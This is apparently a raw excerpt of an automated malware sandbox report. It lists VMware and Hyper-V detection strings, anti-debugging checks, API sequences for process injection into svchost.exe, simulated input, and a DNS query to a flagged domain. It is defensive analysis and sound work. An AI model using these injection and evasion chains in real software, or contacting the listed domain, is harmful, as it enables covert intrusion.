        Source: svchost.exe, 00000021.00000000.392493855.0000023E48858000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.790934591.0000023E48858000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
        Source: svchost.exe, 00000009.00000002.796378573.00000244FC274000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%SystemRoot%\System32\wuaueng.dll,-400Hyper-V RAWRSVP UDP Service Provider
        Source: svchost.exe, 00000007.00000000.285559352.0000022BAEE24000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.788593785.0000022BAEE24000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUSER\
        Source: svchost.exe, 00000009.00000002.795608571.00000244FC25B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.289682495.000002D6CB057000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.302890890.000002D6C5829000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.288440245.000002D6C5829000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.532387537.000002D6C5829000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.303692497.000002D6CB057000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.533717540.000002D6CB057000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.790028959.000001F97EA3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.796465205.000001F97F300000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.314619419.000001F97EA3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.312783042.000001F97EA3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: svchost.exe, 0000001E.00000000.373718108.000001E553A29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: svchost.exe, 0000001E.00000002.790938720.000001E553A55000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11
        Source: svchost.exe, 0000001E.00000000.373718108.000001E553A29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
        Source: svchost.exe, 0000001E.00000000.373838868.000001E553A55000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 0000001E.00000000.373664620.000001E553A13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}YSTE
        Source: svchost.exe, 0000001E.00000000.373718108.000001E553A29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
        Source: svchost.exe, 00000014.00000002.788624937.000002468A813000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}DLL
        Source: svchost.exe, 0000001E.00000002.792697018.000001E553B15000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonic\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}DeviceArrival
        Source: svchost.exe, 0000001E.00000000.373838868.000001E553A55000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000011.00000002.789990310.000001DBFC247000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.309779347.000001DBFC247000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.318161364.000001B6D5429000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.322153579.000001B6D5429000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.791235321.000001B6D5429000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.791599934.000002468A87B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.327334491.000002468A87B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.792236508.0000025138C85000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.333950039.0000025138C85000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.344356398.00000226F8029000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.789446404.00000226F8029000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: svchost.exe, 0000001B.00000002.790798293.00000236F2C29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
        Source: svchost.exe, 00000009.00000002.793984392.00000244FC213000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (5>OVMware, Inc.mxwlxu uagcxoqgijvg 2.0
        Source: svchost.exe, 0000001E.00000000.373979106.000001E553A89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000012.00000000.314586977.000001F97EA29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.789558608.000001F97EA29000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.312702120.000001F97EA29000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0L
        Source: svchost.exe, 0000001E.00000002.790140368.000001E553A3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a0c91efb8b}
        Source: svchost.exe, 0000000B.00000000.289708196.000002D6CB064000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.533761701.000002D6CB064000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000000.303708302.000002D6CB064000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
        Source: svchost.exe, 0000001E.00000000.373664620.000001E553A13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 0000001E.00000000.373838868.000001E553A55000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000023.00000000.401771191.000002828DC7D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: svchost.exe, 00000023.00000000.401771191.000002828DC7D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
        Source: svchost.exe, 0000001E.00000000.373664620.000001E553A13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000023.00000000.402374012.000002828E323000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareGDRBL3HKWin32_VideoController_49HMPBSVideoController120060621000000.000000-00051069914display.infMSBDAFMN7BN6OPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsPKDUZO57
        Source: svchost.exe, 0000001E.00000000.373838868.000001E553A55000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000023.00000000.401771191.000002828DC7D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityNECVMWar VMware SATA CD00{4d36e965-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityCD-ROM DriveSCSI\CDROM&VEN_NECVMWAR&PROD_RX_7ANUM_SATA_CD00\5&280B647&0&000000System.String[](Standard CD-ROM drives)NECVMWar VMware SATA CD00CDROMSCSI\CDROM&VEN_NECVMWAR&PROD_9UH16YZX_SATA_CD00\5&280B647&0&000000cdromOKWin32_ComputerSystemcomputerBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
        Source: svchost.exe, 0000001E.00000000.373838868.000001E553A55000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000023.00000000.402374012.000002828E323000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: stringComputer System ProductComputer System Product74PV5N20D83542-CB48-FFC7-AA5E-D037A04953D7VMware, Inc.None
        Source: svchost.exe, 00000009.00000003.289880851.00000244FC2AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.mxwlxu uagcxoqgijvg 2.0
        Source: svchost.exe, 00000009.00000002.793984392.00000244FC213000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@"(
        Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0464B0C0 GetTickCount,GetCurrentProcessId,gethostname,GetSystemInfo,RegOpenKeyW,RegQueryValueExW,RegCloseKey,GlobalMemoryStatusEx,CoInitialize,5_2_0464B0C0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04634C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,5_2_04634C20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04634E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_04634E30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046356D0 FindFirstFileW,FindClose,5_2_046356D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046357F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,5_2_046357F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04636A40 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,5_2_04636A40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046342B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,5_2_046342B0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5363F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,7_2_0000022BAF5363F0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF534AE3 FindFirstFileW,FindClose,7_2_0000022BAF534AE3
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF534B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,7_2_0000022BAF534B90
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF537A30 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,7_2_0000022BAF537A30
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5349FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,7_2_0000022BAF5349FF
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5706D8 FindFirstFileExA,7_2_0000022BAF5706D8
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF5357B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_0000022BAF5357B0
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF54AE20 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,7_2_0000022BAF54AE20
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF535E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,std::_Xinvalid_argument,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,std::_Xinvalid_argument,std::_Xinvalid_argument,7_2_0000022BAF535E30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04645CA0 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,5_2_04645CA0
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040AF60 LoadLibraryA,GetProcAddress,_memset,ShellExecuteExW,0_2_0040AF60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0465F37F mov eax, dword ptr fs:[00000030h]5_2_0465F37F
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EBF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00402EBF
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF55BA64 GetLastError,IsDebuggerPresent,OutputDebugStringW,7_2_0000022BAF55BA64
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040185D GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,___crtGetCommandLineW,___crtGetEnvironmentStringsW,__wsetargv,__amsg_exit,__wsetenvp,__amsg_exit,__cinit,__amsg_exit,0_2_0040185D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04641D40 SetEvent,InterlockedExchange,BlockInput,BlockInput,BlockInput,5_2_04641D40
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EBF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00402EBF
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406F1E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_LocaleUpdate::_LocaleUpdate,__isctype_l,0_2_00406F1E
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407DC8 SetUnhandledExceptionFilter,__encode_pointer,0_2_00407DC8
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407DEA __decode_pointer,SetUnhandledExceptionFilter,0_2_00407DEA
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040158C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040158C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0465ED1C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0465ED1C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0465667E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0465667E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04655EB6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_04655EB6
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF56411C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0000022BAF56411C
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF55B5A4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0000022BAF55B5A4

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\svchost.exeDomain query: g.agametog.com
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22BAF470000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2D6CAF50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DBFC860000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F97F060000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B6D5F40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2468AF80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25139740000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 226F8C80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 195989A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 236F3320000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24E71DB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F1ED140000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E554130000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AF62F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23E48FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DD8F7B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2828E500000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 151ABB60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 12DBC450000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04649910 WaitForSingleObject,GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,CloseHandle,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,Sleep,Sleep,Sleep,Sleep,Sleep,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,5_2_04649910
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: AF470000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: CAF50000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: FC860000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 7F060000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: D5F40000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 8AF80000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 39740000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: F8C80000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 989A0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: F3320000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 71DB0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: ED140000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 54130000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 62F80000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 48FA0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 8F7B0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 8E500000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: ABB60000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: BC450000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 22BAF470000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2D6CAF50000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFC860000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1F97F060000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1B6D5F40000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2468AF80000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 25139740000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 226F8C80000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 195989A0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 236F3320000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 24E71DB0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1F1ED140000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1E554130000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1AF62F80000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 23E48FA0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD8F7B0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2828E500000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 151ABB60000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 12DBC450000Jump to behavior
        Source: C:\Windows\System32\svchost.exeThread register set: target process: 5440Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04649000 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,5_2_04649000
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF54BBD0 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,7_2_0000022BAF54BBD0
        Source: C:\Windows\System32\svchost.exeThread register set: 5440 4D000Jump to behavior
        Source: C:\Windows\System32\svchost.exeCode function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,FindCloseChangeNotification,Sleep,Sleep,Sleep,Sleep,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k WspService7_2_0000022BAF54C670
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04642090 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,5_2_04642090
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" -hJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WspServiceJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04642090 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,5_2_04642090
